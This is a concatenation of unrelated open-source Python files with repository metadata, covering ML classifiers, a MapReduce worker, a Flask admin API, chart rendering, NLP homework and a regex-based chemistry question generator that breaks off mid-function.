fusion5 = fusions.Block([first_three.shape[1], second_three.shape[1]], first_three.shape[1]+second_three.shape[1])
final_fused = fusion5([first_three, second_three])
return combined, y, F, Va, emb_desc, emb_sit, emb_sce, emb_trans
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
if epoch == 100:
lr = lr * 0.1
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy_multihots(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
# maxk = max(topk)
# batch_size = target.size(0)
batch_size = 1
_, pred = output.topk(1, 1, True, True)
target_value = torch.gather(target, 1, pred)
# target_inds_one = (target != 0).nonzero()
correct_k = (target_value > 0).float().sum(0, keepdim=False).sum(0, keepdim=True)
correct_k /= target.shape[0]
res = (correct_k.mul_(100.0))
return res
class AverageMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
| affect2mm/emotion-timeseries | emotion-timeseries/MovieGraphs/utils_co_attn.py | utils_co_attn.py | py | 9,455 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.arr... |
22477753948 |
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn import model_selection as sk_ms
from sklearn.model_selection import train_test_split
from sklearn.metrics import auc, accuracy_score, f1_score
from sklearn.neural_network import MLPClassifier
RANDOM_SEED = 20
FRAC_TRAIN = 0.8
class Classification(object):
def __init__(self, features, labels):
self.features = features
self.labels = labels
def classification(self):
c1 = DecisionTreeClassifier(random_state=0)
c2 = KNeighborsClassifier(n_neighbors=5) ## testar outros parametros 3 41.6666666 ### 5 45.
c3 = GaussianNB()
c4 = SVC(kernel='linear', probability=True)
#c5 = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)
classifiers = [c1,c2,c3,c4]
results = []
X_train, X_test, y_train, y_test = train_test_split(self.features, self.labels, stratify=self.labels, test_size=(1.0 - FRAC_TRAIN), random_state=RANDOM_SEED)
for classifier in classifiers:
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
score = accuracy_score(y_test, y_pred)
print(y_test, y_pred)
print("Score {}".format(score))
#scores = sk_ms.cross_val_score(i, self.features, self.labels, cv=self.kfold, scoring='accuracy', n_jobs=-1, verbose=0)
#score = round(scores.mean() * 100, 2)
#sd = round(scores.std()*100, 2)
results.append(score)
return results
def get_scores(self):
return np.array(self.classification())
| mailaucq/book_classification | classifierv2.py | classifierv2.py | py | 1,771 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sklearn.neighbors.KNeighborsClassifier",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sklearn.naive_bayes.GaussianNB",
"line_number": 24,
"usage_typ... |
15596107022 | import os
import traceback
from . import datasets
from . import tasks
from . import util
from logging import getLogger
logger = getLogger('mrs')
class WorkerSetupRequest(object):
"""Request the worker to run the setup function."""
def __init__(self, opts, args, default_dir):
self.id = 'worker_setup'
self.opts = opts
self.args = args
self.default_dir = default_dir
def id(self):
return self.__class__.__name__
class WorkerRemoveRequest(object):
def __init__(self, *args):
(self.directory,) = args
def id(self):
return self.__class__.__name__
class WorkerTaskRequest(object):
"""Request the to worker to run a task."""
def __init__(self, *args):
_, _, self.dataset_id, self.task_index, _, _, _, _, _ = args
self.args = args
def id(self):
return '%s_%s_%s' % (self.__class__.__name__, self.dataset_id,
self.task_index)
class WorkerQuitRequest(object):
"""Request the worker to quit."""
class WorkerFailure(object):
"""Failure response from worker."""
def __init__(self, dataset_id, task_index, exception, traceback,
request_id):
self.dataset_id = dataset_id
self.task_index = task_index
self.exception = exception
self.traceback = traceback
self.request_id = request_id
class WorkerSetupSuccess(object):
"""Successful worker setup."""
class WorkerSuccess(object):
"""Successful response from worker."""
def __init__(self, dataset_id, task_index, outdir, outurls, request_id):
self.dataset_id = dataset_id
self.task_index = task_index
self.outdir = outdir
self.outurls = outurls
self.request_id = request_id
class Worker(object):
"""Execute map tasks and reduce tasks.
The worker waits for other threads to make assignments by calling
start_map and start_reduce.
This needs to run in a daemon thread rather than in the main thread so
that it can be killed by other threads.
"""
def __init__(self, program_class, request_pipe):
self.program_class = program_class
self.request_pipe = request_pipe
self.default_dir = None
self.program = None
self.opts = None
self.args = None
def run(self):
while self.run_once():
pass
def run_once(self):
"""Runs one iteration of the event loop.
Returns True if it should keep running.
"""
request = None
response = None
try:
request = self.request_pipe.recv()
if isinstance(request, WorkerSetupRequest):
assert self.program is None
self.opts = request.opts
self.args = request.args
logger.debug('Starting to run the user setup function.')
util.log_ram_usage()
self.program = self.program_class(self.opts, self.args)
self.default_dir = request.default_dir
response = WorkerSetupSuccess()
elif isinstance(request, WorkerQuitRequest):
return False
elif isinstance(request, WorkerRemoveRequest):
util.remove_recursive(request.directory)
else:
assert self.program is not None
logger.info('Running task: %s, %s' %
(request.dataset_id, request.task_index))
util.log_ram_usage()
max_sort_size = getattr(self.opts, 'mrs__max_sort_size', None)
t = tasks.Task.from_args(*request.args, program=self.program)
t.run(self.program, self.default_dir,
max_sort_size=max_sort_size)
response = WorkerSuccess(request.dataset_id,
request.task_index, t.outdir, t.outurls(),
request.id())
logger.info('Completed task: %s, %s' %
(request.dataset_id, request.task_index))
util.log_ram_usage()
except KeyboardInterrupt:
return
except Exception as e:
logger.info('Failed task: %s, %s' %
(request.dataset_id, request.task_index))
request_id = request.id() if request else None
tb = traceback.format_exc()
response = WorkerFailure(request.dataset_id, request.task_index,
e, tb, request_id)
if response:
self.request_pipe.send(response)
return True
def profiled_run(self):
#TODO: detect the node number for other systems (e.g., pbs)
nodenum = os.getenv('PSSH_NODENUM')
if nodenum:
filename = 'mrs-worker-%s.prof' % nodenum
else:
filename = 'mrs-worker.prof'
util.profile_loop(self.run_once, (), {}, filename)
class WorkerManager(object):
"""Mixin class that provides methods for dealing with Workers.
Assumes that a worker_pipe attribute is defined and that read_worker_pipe
is called when data is available. Also assumes that a current_task
attribute is available.
"""
def worker_setup(self, opts, args, default_dir):
request = WorkerSetupRequest(opts, args, default_dir)
self.worker_pipe.send(request)
response = self.worker_pipe.recv()
if isinstance(response, WorkerSetupSuccess):
return True
if isinstance(response, WorkerFailure):
msg = 'Exception in Worker Setup: %s' % response.exception
logger.critical(msg)
msg = 'Traceback: %s' % response.traceback
logger.error(msg)
return False
else:
raise RuntimeError('Invalid message type.')
def read_worker_pipe(self):
"""Reads a single response from the worker pipe."""
r = self.worker_pipe.recv()
if not (isinstance(r, WorkerSuccess) or isinstance(r, WorkerFailure)):
assert False, 'Unexpected response type'
assert self.current_task == (r.dataset_id, r.task_index)
self.current_task = None
if isinstance(r, WorkerSuccess):
self.worker_success(r)
elif isinstance(r, WorkerFailure):
msg = 'Exception in Worker: %s' % r.exception
logger.critical(msg)
msg = 'Traceback: %s' % r.traceback
logger.error(msg)
self.worker_failure(r)
def submit_request(self, request):
"""Submit the given request to the worker.
If one_at_a_time is specified, then no other one_at_time requests can
be accepted until the current task finishes. Returns a boolean
indicating whether the request was accepted.
Called from the RPC thread.
"""
if isinstance(request, WorkerTaskRequest):
if self.current_task is not None:
return False
self.current_task = (request.dataset_id, request.task_index)
self.worker_pipe.send(request)
return True
def worker_success(self, response):
"""Called when a worker sends a WorkerSuccess for the given task."""
raise NotImplementedError
def worker_failure(self, response):
"""Called when a worker sends a WorkerFailure for the given task."""
raise NotImplementedError
# vim: et sw=4 sts=4
| byu-aml-lab/mrs-mapreduce | mrs/worker.py | worker.py | py | 7,442 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "traceback.format_exc",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 154,
"usage_type": "call"
}
] |
44037875301 | from flask import Blueprint, request, jsonify
from flask_cors import CORS
from storeback.models import db
from storeback.models.admins import Admin
admin_api = Blueprint('admin_api', __name__)
CORS(admin_api)
@admin_api.route('/api/admin', methods=['GET'])
def get_all_admins():
params = request.args
admins = Admin.query.filter_by(**params).all()
return jsonify([admin.to_json() for admin in admins])
@admin_api.route('/api/admin/<int:id>', methods=['GET'])
def get_one_admin(id):
admin = Admin.query.filter_by(id=id).first_or_404()
return jsonify(admin.to_json())
@admin_api.route('/api/admin', methods=['POST'])
def create_one_admin():
if not request.json:
return 'Please provide a valid json body with your request', 400
admin = Admin()
admin.firstname = request.json['firstname']
admin.lastname = request.json['lastname']
admin.email = request.json['email']
admin.password = Admin.generate_hash(request.json['password'])
db.session.add(admin)
db.session.commit()
return jsonify(admin.to_json())
@admin_api.route('/api/admin/<int:id>', methods=['PATCH'])
def patch_one_admin(id):
if not request.json:
return 'Please provide a valid json body with your request', 400
Admin.query.filter_by(id=id).update(request.json)
db.session.commit()
patched_admin = Admin.query.filter_by(id=id).first_or_404()
return jsonify(patched_admin.to_json())
@admin_api.route('/api/admin/<int:id>', methods=['DELETE'])
def delete_one_admin(id):
admin_to_delete = Admin.query.filter_by(id=id).first_or_404()
db.session.delete(admin_to_delete)
db.session.commit()
return '', 204 | rguan72/StoreBack | storeback/handlers/admin.py | admin.py | py | 1,682 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",... |
18458121758 | from __future__ import unicode_literals
import datetime
import cairo
import pycha.line
import StringIO
import time
import six
from uds.models import getSqlDatetime
import counters
# Chart types
CHART_TYPE_LINE, CHART_TYPE_AREA, CHART_TYPE_BAR = range(3) # @UndefinedVariable
__typeTitles = None
def make(obj, counterType, **kwargs):
width, height = (kwargs.get('width', 800), kwargs.get('height', 600))
since = kwargs.get('since', None)
to = kwargs.get('to', None)
if since is None and to is None:
interval = kwargs.get('interval', None)
if interval is not None:
to = getSqlDatetime()
since = to - datetime.timedelta(days=interval)
limit = width
dataset1 = tuple((int(time.mktime(x[0].timetuple())), x[1]) for x in counters.getCounters(obj, counterType, since=since, to=to, limit=limit, use_max=kwargs.get('use_max', False)))
if len(dataset1) == 0:
dataset1 = ((getSqlDatetime(True) - 3600, 0), (getSqlDatetime(True), 0))
firstLast = (dataset1[0][0], getSqlDatetime(True))
xLabelFormat = '%y-%m-%d'
diffInterval = firstLast[1] - firstLast[0]
if diffInterval <= 60 * 60 * 24: # Less than one day
xLabelFormat = '%H:%M'
elif diffInterval <= 60 * 60 * 24 * 7:
xLabelFormat = '%A'
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)
dataset = ((counters.getCounterTitle(counterType).encode('iso-8859-1', errors='ignore'), dataset1),)
options = {
'axis': {
'x': {
'ticks': [dict(v=i, label=datetime.datetime.fromtimestamp(i).strftime(xLabelFormat)) for i in firstLast],
'range': (firstLast[0], firstLast[1])
},
'y': {
'tickCount': 4,
}
},
'legend': {'hide': True},
'background': {
'chartColor': '#ffeeff',
'baseColor': '#ffffff',
'lineColor': '#444444'
},
'colorScheme': {
'name': 'gradient',
'args': {
'initialColor': 'red',
},
},
'legend': {
'hide': True,
},
'padding': {
'left': 0,
'bottom': 0,
},
'title': 'Sample Chart'
}
chart = pycha.line.LineChart(surface, options)
chart.addDataset(dataset)
chart.render()
output = StringIO.StringIO()
surface.write_to_png(output)
return output.getvalue()
| karthik-arjunan/testuds | server/src/uds/core/util/stats/charts.py | charts.py | py | 2,497 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "uds.models.getSqlDatetime",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "time.mktime",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "counters.get... |
75173901865 |
"""Read a numpy file and output an image."""
import sys
import numpy as np
from PIL import Image
def main(filename):
depth_array = np.load(filename)
print(depth_array.shape)
if np.max(depth_array) > 255:
print("Values over 255! There is going to be truncations")
depth_array = np.clip(depth_array, 0, 255)
byte_array = depth_array.astype(np.uint8)
img = Image.fromarray(byte_array, 'L')
outfilename = filename.rstrip('npy')+'png'
img.save(outfilename)
# img.show()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("usage: python {} <filename>".format(sys.argv[0]))
exit()
main(sys.argv[1])
| squeakus/bitsandbytes | blenderscripts/npy2img.py | npy2img.py | py | 677 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.clip",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 17,
... |
36121229353 | import os
from typing import Any, Iterator, Dict, Set
from forte.data.data_pack import DataPack
from forte.data.data_utils_io import dataset_path_iterator
from forte.data.base_reader import PackReader
from ft.onto.base_ontology import Document
__all__ = [
"PlainTextReader",
]
class PlainTextReader(PackReader):
r""":class:`PlainTextReader` is designed to read in plain text dataset."""
def _collect(self, text_directory) -> Iterator[Any]:
r"""Should be called with param ``text_directory`` which is a path to a
folder containing txt files.
Args:
text_directory: text directory containing the files.
Returns:
Iterator over paths to .txt files
"""
return dataset_path_iterator(text_directory, self.configs.file_ext)
def _cache_key_function(self, text_file: str) -> str:
return os.path.basename(text_file)
# pylint: disable=unused-argument
def text_replace_operation(self, text: str):
return []
def _parse_pack(self, file_path: str) -> Iterator[DataPack]:
pack = DataPack()
with open(file_path, "r", encoding="utf8", errors="ignore") as file:
text = file.read()
pack.set_text(text, replace_func=self.text_replace_operation)
Document(pack, 0, len(pack.text))
pack.pack_name = file_path
yield pack
@classmethod
def default_configs(cls):
return {"file_ext": ".txt"}
def record(self, record_meta: Dict[str, Set[str]]):
r"""Method to add output type record of `PlainTextReader` which is
`ft.onto.base_ontology.Document` with an empty set
to :attr:`forte.data.data_pack.Meta.record`.
Args:
record_meta: the field in the datapack for type record that need to
fill in for consistency checking.
"""
record_meta["ft.onto.base_ontology.Document"] = set()
| asyml/forte | forte/data/readers/plaintext_reader.py | plaintext_reader.py | py | 1,931 | python | en | code | 230 | github-code | 36 | [
{
"api_name": "forte.data.base_reader.PackReader",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "forte.data.data_utils_io.dataset_path_iterator",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "typing.Iterator",
"line_number": 17,
"usage_type": "name... |
30112355766 | import os
import wikipedia
from nltk.tag.stanford import StanfordPOSTagger
from nltk.tokenize import sent_tokenize
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
import matplotlib.pyplot as plt
os.environ["JAVAHOME"] = "C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" # didn't have java in path on my local machine :)
model_path = "../stanford-postagger-full-2018-10-16/models/english-bidirectional-distsim.tagger"
jar_path = "../stanford-postagger-full-2018-10-16/stanford-postagger.jar"
tagger = StanfordPOSTagger(model_path, jar_path)
def ex1():
page = wikipedia.page("Shrek")
content = page.content
words_in_text = word_tokenize(content)
print("Title: " + page.title)
print("First 200 words: ", words_in_text[:200])
sentences = sent_tokenize(content)
# get first 20 sentences (or maximum if not having 20)
first_20_sentences = sentences[:min(20, len(sentences))]
# word tokenize the sentence and apply tagger
tagger_results = [tagger.tag(word_tokenize(el)) for el in first_20_sentences]
print(tagger_results)
return page
def list_of_words_for_tag(text, tag):
# break it into sentences
sentences = sent_tokenize(text)
# for every sentence, get words (apply word_tokenize) and apply POS Tagger to get tags
tagger_results = [tagger.tag(word_tokenize(el)) for el in sentences]
# filter to get only the given tag
return [el for sublist in tagger_results for (el, word_tag) in sublist if word_tag == tag]
def ex2(text, tags):
return [el for tag in tags for el in list_of_words_for_tag(text, tag)]
def ex3(text):
nouns_tags = ["NN", "NNS", "NNP", "NNPS"]
verbs_tags = ["VB", "VBD", "VBG", "VBN", "VBP", "VBZ"]
number_of_words_in_text = get_number_of_words_in_text(text)
nouns = ex2(text, nouns_tags)
verbs = ex2(text, verbs_tags)
print("Nouns: ", nouns)
print("Verbs: ", verbs)
print("Percentage of content words: ", (len(nouns) + len(verbs)) / number_of_words_in_text * 100, "%")
def get_number_of_words_in_text(text):
return len(word_tokenize(text))
def ex4(text, n=5):
print("Original word | POS | Simple lemmatization | Lemmatization with POS")
lemma = WordNetLemmatizer()
sentences = sent_tokenize(text)
sentences = sentences[:min(n, len(sentences))]
tagger_results = [tagger.tag(word_tokenize(el)) for el in sentences]
tagger_results = [el for sublist in tagger_results for el in sublist]
already_counted = []
for word, tag in tagger_results:
word_net_pos = get_wordnet_pos(tag)
# Do nothing if not a knows (or lemmatizable word)
if word_net_pos == '':
continue
lemmatization = lemma.lemmatize(word)
lemmatization_with_pos = lemma.lemmatize(word, word_net_pos)
if lemmatization != lemmatization_with_pos and (word, tag) not in already_counted:
print_table_row(word, tag, lemmatization, lemmatization_with_pos)
already_counted.append((word, tag))
def print_table_row(original_word, pos, lemmatization, lemmatization_with_pos):
print(original_word + " | " + pos + " | " + lemmatization + " | " + lemmatization_with_pos)
def get_wordnet_pos(tag):
if tag.startswith('J'):
return wordnet.ADJ
elif tag.startswith('V'):
return wordnet.VERB
elif tag.startswith('N'):
return wordnet.NOUN
elif tag.startswith('R'):
return wordnet.ADV
else:
return ''
def ex5(text, maximum=5):
sentences = sent_tokenize(text)
tagger_results = [tagger.tag(word_tokenize(el)) for el in sentences]
tagger_results = [el for sublist in tagger_results for el in sublist]
pos_numbers = dict()
for _, tag in tagger_results:
if tag not in pos_numbers:
pos_numbers[tag] = 1
else:
pos_numbers[tag] += 1
# pos_numbers = pos_numbers[:min(maximum, len(pos_numbers))]
pos_numbers = [(key, value) for key, value in pos_numbers.items()]
pos_numbers.sort(key=lambda el: el[1], reverse=True)
pos_numbers = pos_numbers[:min(maximum, len(pos_numbers))]
keys = [key for key, _ in pos_numbers]
values = [value for _, value in pos_numbers]
plt.bar(keys, values)
plt.show()
# Voi folosi un text mai scurt pentru teste. Pentru cum este conceputa cerinta, din pacate, se fac multe
# calcule oarecum, degeaba, asa ca voi folosi un text mai scurt pentru a nu astepta foarte mult.
# Daca se vrea rularea pe textul din wikipedia se va rula pe urmatorul text: page.content
TEST_TEXT = "This is my test text. With this test text I will test everything. This is great, amazing text." \
" I will make this text great again! Why are you running?"
if __name__ == "__main__":
print("Ex1")
page = ex1()
print("Ex3")
# ex3(page.content)
ex3(TEST_TEXT)
print("Ex4")
ex4(TEST_TEXT)
print("Ex4")
ex5(TEST_TEXT)
| daneel95/Master_Homework | Restanta/NLP/Lab3/homework1.py | homework1.py | py | 4,985 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "nltk.tag.stanford.StanfordPOSTagger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "wikipedia.page",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "nl... |
21619670691 | import unittest
from mock import Mock
from apache_beam.metrics.cells import DistributionData
from apache_beam.runners.google_cloud_dataflow.dataflow_runner import DataflowRunner
from apache_beam.runners.google_cloud_dataflow.internal import apiclient
from apache_beam.runners.google_cloud_dataflow.internal.clients import dataflow
from apache_beam.utils.pipeline_options import PipelineOptions
class UtilTest(unittest.TestCase):
@unittest.skip("Enable once BEAM-1080 is fixed.")
def test_create_application_client(self):
pipeline_options = PipelineOptions()
apiclient.DataflowApplicationClient(
pipeline_options,
DataflowRunner.BATCH_ENVIRONMENT_MAJOR_VERSION)
def test_default_job_name(self):
job_name = apiclient.Job.default_job_name(None)
regexp = 'beamapp-.*-[0-9]{10}-[0-9]{6}'
self.assertRegexpMatches(job_name, regexp)
def test_split_int(self):
number = 12345
split_number = apiclient.to_split_int(number)
self.assertEqual((split_number.lowBits, split_number.highBits),
(number, 0))
shift_number = number << 32
split_number = apiclient.to_split_int(shift_number)
self.assertEqual((split_number.lowBits, split_number.highBits),
(0, number))
def test_translate_distribution(self):
metric_update = dataflow.CounterUpdate()
distribution_update = DistributionData(16, 2, 1, 15)
apiclient.translate_distribution(distribution_update, metric_update)
self.assertEqual(metric_update.distribution.min.lowBits,
distribution_update.min)
self.assertEqual(metric_update.distribution.max.lowBits,
distribution_update.max)
self.assertEqual(metric_update.distribution.sum.lowBits,
distribution_update.sum)
self.assertEqual(metric_update.distribution.count.lowBits,
distribution_update.count)
def test_translate_means(self):
metric_update = dataflow.CounterUpdate()
accumulator = Mock()
accumulator.sum = 16
accumulator.count = 2
apiclient.MetricUpdateTranslators.translate_scalar_mean_int(accumulator,
metric_update)
self.assertEqual(metric_update.integerMean.sum.lowBits, accumulator.sum)
self.assertEqual(metric_update.integerMean.count.lowBits, accumulator.count)
accumulator.sum = 16.0
accumulator.count = 2
apiclient.MetricUpdateTranslators.translate_scalar_mean_float(accumulator,
metric_update)
self.assertEqual(metric_update.floatingPointMean.sum, accumulator.sum)
self.assertEqual(
metric_update.floatingPointMean.count.lowBits, accumulator.count)
if __name__ == '__main__':
unittest.main()
| a0x8o/kafka | sdks/python/apache_beam/runners/google_cloud_dataflow/internal/apiclient_test.py | apiclient_test.py | py | 2,815 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.utils.pipeline_options.PipelineOptions",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "apache_beam.runners.google_cloud_dataflow.internal.apiclient.DataflowAp... |
14838409343 | import json
import random
import re
import pubchempy as pcp
from csv_to_json import formulate_code
# -------- \begin constants ----------------------
atoms_list = [" Hydrogen ",
" Helium ",
" Lithium ",
" Beryllium ",
" Boron ",
" Carbon ",
" Nitrogen ",
" Oxygen ",
" Fluorine ",
" Neon ",
" Sodium ",
" Magnesium ",
" Aluminium ",
" Silicon ",
" Phosphorus ",
" Sulfur ",
" Chlorine ",
" Argon ",
" Potassium ",
" Calcium ",
" Scandium ",
" Titanium ",
" Vanadium ",
" Chromium ",
" Manganese ",
" Iron ",
" Cobalt ",
" Nickel ",
" Copper ",
" Zinc ",
" Gallium ",
" Germanium ",
" Arsenic ",
" Selenium ",
" Bromine ",
" Krypton ",
" Rubidium ",
" Strontium ",
" Yttrium ",
" Zirconium ",
" Niobium ",
" Molybdenum ",
" Technetium ",
" Ruthenium ",
" Rhodium ",
" Palladium ",
" Silver ",
" Cadmium ",
" Indium ",
" Tin ",
" Antimony ",
" Tellurium ",
" Iodine ",
" Xenon ",
" Cesium ",
" Barium ",
" Lanthanum ",
" Cerium ",
" Praseodymium ",
" Neodymium ",
" Promethium ",
" Samarium ",
" Europium ",
" Gadolinium ",
" Terbium ",
" Dysprosium ",
" Holmium ",
" Erbium ",
" Thulium ",
" Ytterbium ",
" Lutetium ",
" Hafnium ",
" Tantalum ",
" Tungsten ",
" Rhenium ",
" Osmium ",
" Iridium ",
" Platinum ",
" Gold ",
" Mercury ",
" Thallium ",
" Lead ",
" Bismuth ",
" Polonium ",
" Astatine ",
" Radon ",
" Francium ",
" Radium ",
" Actinium ",
" Thorium ",
" Protactinium ",
" Uranium ",
" Neptunium ",
" Plutonium ",
" Americium ",
" Curium ",
" Berkelium ",
" Californium ",
" Einsteinium ",
" Fermium ",
" Mendelevium ",
" Nobelium ",
" Lawrencium ",
" Rutherfordium ",
" Dubnium ",
" Seaborgium ",
" Bohrium ",
" Hassium ",
" Meitnerium ",
" Darmstadtium ",
" Roentgenium ",
" Copernicium ",
" Nihonium ",
" Flerovium ",
" Moscovium ",
" Livermorium ",
" Tennessine ",
" Oganesson ",
]
not_a_compound_list = ["the", "was", "and", "get", "of", "in", "as", "an"]
# -------- \end constants ----------------------
# -------- \begin question types ----------------------
def if_the_temprature_passes(row):
if re.search("If the temperature passes", row["contexts"]) is None:
return None, None, None, None
else:
additional_info = re.search(
"If the temperature passes \d+ degrees when heating .* for more than \d+ seconds .*", row["contexts"])
temp_threshold_str = re.findall("\d+ degrees", additional_info.group())
heat_duration_str = re.findall("\d+ seconds", additional_info.group())
loss_str = re.findall("loss of (\D*\d+\.?\d* [grams|milligrams|\%]+)", additional_info.group())
name = re.findall(" when heating (.*) for more", additional_info.group())
return temp_threshold_str, loss_str, heat_duration_str, name
def We_discovered_that_if_the_amount_of(row):
if re.search("We discovered that if the amount of", row["contexts"]) is None:
return None, None
else:
additional_info = re.search(
"We discovered that if the amount of .*", row["contexts"])
quantity_threshold = re.findall("above (\D*\d+\.?\d* [grams|milligrams|\%]+)", additional_info.group())
threshold_comp_name = re.findall("the amount of (.*) in", additional_info.group())
temp_threshold_str = re.findall("the temperature is less than (\D*\d+\.?\d* degrees)", additional_info.group())
loss_str = re.findall("the product of the process decreases by (\d+\%)", additional_info.group())
return temp_threshold_str, loss_str, quantity_threshold, threshold_comp_name
def overheat_the(row):
if re.search("Overheat the .*", row["contexts"]) is None:
return None, None, None
else:
additional_info = re.search(
"Overheat the .*", row["contexts"])
temp_threshold_str = re.findall("the temperature is above (\D*\d+\.?\d* degrees)", additional_info.group())
decrease_ratio_str = re.findall("for each (\d+\.\d+ [second|hour]+)", additional_info.group())
loss_str = re.findall("a loss of (\D*\d+\.?\d* [grams|milligrams|ml|ML\%]+)", additional_info.group())
product_name = re.findall("Overheat the (.*) will result", additional_info.group())
return temp_threshold_str, loss_str, decrease_ratio_str, product_name
def if_we_heat(row):
if re.search("If we heat .*", row["contexts"]) is None:
return None, None
else:
additional_info = re.search(
"If we heat .*", row["contexts"])
temp_threshold_str = re.findall("to temperature higher than (\D*\d+\.?\d* degrees)", additional_info.group())
loss_str = re.findall("at a rate of (\D*\d+\.?\d* [grams|milligrams|milliliters|\%]+) per minute.",
additional_info.group())
name = re.findall("If we heat (.*) to tem", additional_info.group())
return temp_threshold_str, loss_str, name
def stirring_the_mixture_longer(row):
if re.search("stirring the mixture longer.*", row["contexts"]) is None:
return None, None
else:
additional_info = re.search(
"stirring the mixture longer.*", row["contexts"])
loss_str = re.findall("will cause a loss of (\D*\d+\.?\d* [grams|milligrams|milliliters|\%]+)",
additional_info.group())
decrease_ratio_str = re.findall("for each (minute|hour) above the original time",
additional_info.group())
name = ["the mixture"]
return loss_str, decrease_ratio_str, name
def if_the_temperature_exceed(row):
if re.search(" If the temperature exceed .*", row["contexts"]) is None:
return None, None
else:
additional_info = re.search(
"If the temperature exceed .*", row["contexts"])
temp_threshold_str = re.findall("If the temperature exceed (\D*\d+\.?\d* degrees)",
additional_info.group())
decrease_ratio_str = re.findall("it will result in (\d+\% decrease) in the final products",
additional_info.group())
name = re.findall("when heating (.*) it will result", additional_info.group())
return temp_threshold_str, decrease_ratio_str, name
def if_we_cool_the_mixture(row):
if re.search("If we cool the mixture.*", row["contexts"]) is None:
return None, None
else:
additional_info = re.search(
"If we cool the mixture.*", row["contexts"])
temp_threshold_str = re.findall("below (\D*\d+\.?\d* degrees)",
additional_info.group())
decrease_ratio_str = re.findall("the product of the process decreases by (\d+\%)",
additional_info.group())
name = ["the mixture"]
return temp_threshold_str, decrease_ratio_str, name
# -------- \end question types ----------------------
# --------- \begin function for generating the question -------
def randomize_product_amount(vars_and_vals):
weight_units = ['gr', 'mg', 'kg']
volume_units = ['mL', 'L']
product_amount = vars_and_vals[1]
amount_unit_split = product_amount.split()
amount_unit_split[0] = float(amount_unit_split[0]) * (random.uniform(0, 2))
amount_unit_split[1] = random.choice(weight_units) if amount_unit_split[1] in weight_units else \
amount_unit_split[1]
amount_unit_split[1] = random.choice(weight_units) if amount_unit_split[1] in volume_units else \
amount_unit_split[1]
return "{:.2f}".format(amount_unit_split[0]) + " " + amount_unit_split[1]
def generate_reactors(components):
available_reactors = ""
reactors_list = []
for comp in components:
if comp[0].startswith("("):
comp[0] = comp[0][1:]
if random.random() < 0.2: # w.p. 20% change the units
weight_units = ['gr', 'mg', 'kg']
volume_units = ['mL', 'L']
amount_unit_split = comp[1].split()
if amount_unit_split[1] == 'g':
amount_unit_split[1] = 'gr'
amount_unit_split[1] = random.choice(weight_units) if amount_unit_split[1] in weight_units else \
amount_unit_split[1]
amount_unit_split[1] = random.choice(weight_units) if amount_unit_split[1] in volume_units else \
amount_unit_split[1]
amount_unit_split[0] = str(float(amount_unit_split[0]) * (random.uniform(0, 2)))
available_reactors += amount_unit_split[0] + " " + amount_unit_split[1] + " of " + comp[0] + ", "
reactors_list.append([amount_unit_split[0], amount_unit_split[1]])
else:
available_reactors += comp[1] + " of " + comp[0] + ", "
reactors_list.append([comp[1], comp[0]])
return available_reactors, reactors_list
def get_vars_from_question(q_vars):
variables = q_vars.split(", ")
code_vars = "["
for var in variables[:-1]:
amount_name = var.split(" of ")
amount_name[1] = amount_name[1].replace("'", "")
amount_name[0] = amount_name[0].replace("'", "")
code_vars += f"( ' {amount_name[1]} ' , ' {amount_name[0]} ' ) ,"
return code_vars + "]"
def get_reactors_and_output(row):
context = row["contexts"]
